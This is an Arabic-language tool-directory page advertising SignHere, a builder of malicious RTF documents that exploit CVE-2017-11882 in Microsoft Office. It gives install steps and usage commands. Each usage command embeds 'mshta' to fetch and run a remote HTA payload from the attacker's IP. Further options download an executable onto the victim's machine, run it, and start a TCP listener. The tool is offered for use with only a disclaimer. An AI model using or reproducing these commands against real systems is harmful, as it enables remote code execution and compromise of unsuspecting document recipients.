Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/retr0-code/signhere
أدوات التصيدتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرة
GitHubretr0-code/signhere

SignHere

SignHere هو تطبيق لـ CVE-2017-11882. SignHere هو منشئ مستند rtf خبيث وحمولات VBScript.

عرض المستودع
62منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

SignHere

مقدمة

CVE-2017-11882 - معرف الثغرة الأمنية الفريد لـ Microsoft Office 2007 Service Pack 3 و Microsoft Office 2010 Service Pack 2 و Microsoft Office 2013 Service Pack 1 و Microsoft Office 2016 يسمح للمهاجم بتشغيل كود في سياق المستخدم الحالي دون معالجة الكائنات في الذاكرة بشكل صحيح، وهو ما يُسمى "ثغرة تلف الذاكرة في Microsoft Office". يتضمن التنفيذ إنشاء برنامج لبناء مستندات rtf الخبيثة وحمولات بلغة VBScript.

مبدأ التشغيل

مستندات rtf هي المعرضة للخطر لأنها يمكن أن تُبرمج من خلال معرفة أوامر خاصة - رؤوس RTF. وبالتالي، يتم إنشاء كائن ثنائي (قابل للتنفيذ) في جسم المستند، في الواقع هو معادلة Microsoft Equation تحتوي على الكود الذي يحتوي على أمر cmd. ثم يمكنك إنشاء الحمولة النافعة بلغة VBScript واستخدام الأمر "mshta link to the payload file" لتنفيذ ملف hta.


تنبيه!

المؤلف والمساهمون غير مسؤولين عن أي ضرر يلحق بك أو يسببه لك.

التثبيت

يتطلب البرنامج Python 3 للتشغيل.

لينكس

يمكنك استخدام Termux، لكن تشغيل البرنامج يتطلب صلاحيات الجذر

root@kitploit:~
git clone https://github.com/Retr0-code/SignHere/
cd SignHere/
chmod +x SignHere.py
./SignHere.py --help

ويندوز

أولاً، تحتاج إلى تنزيل الأرشيف. ثم قم بفك ضغطه وافتح نافذة PowerShell في هذا المجلد واكتب:

root@kitploit:~
.\SignHere.py --help

الاستخدام

root@kitploit:~
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --powershell "start iexplore.exe https://github.com/Retr0-code/SignHere" --ip 192.168.1.74 --output generated.rtf

--cmd الوسيط مع أمر Windows الذي سيتم تنفيذه بعد فتح المستند.

--powershell الوسيط مع أمر PowerShell الذي سيكون في حمولة VBScript.

--ip الوسيط مع عنوان IP الذي سيستخدم لخادم الويب. (الافتراضي: 127.0.0.1)

--output اسم ومسار المستند.


root@kitploit:~
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --temp exploit.exe --ip 192.168.1.74 --output generated.rtf

--temp الوسيط الذي سيستخدم ملفًا ثنائيًا كحمولة (الملف الثنائي سيبدأ تشغيله في ذاكرة RAM).


root@kitploit:~
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --payload exploit.exe --ip 192.168.1.74 --listener-host 192.168.1.74 --output generated.rtf

--payload الوسيط الذي سيقوم بتنزيل ملف على كمبيوتر الضحية وتنفيذه.

--listener-host الوسيط لبدء مستمع TCP على عنوان IP الحالي (الافتراضي: 127.0.0.1)

تنزيل الأداة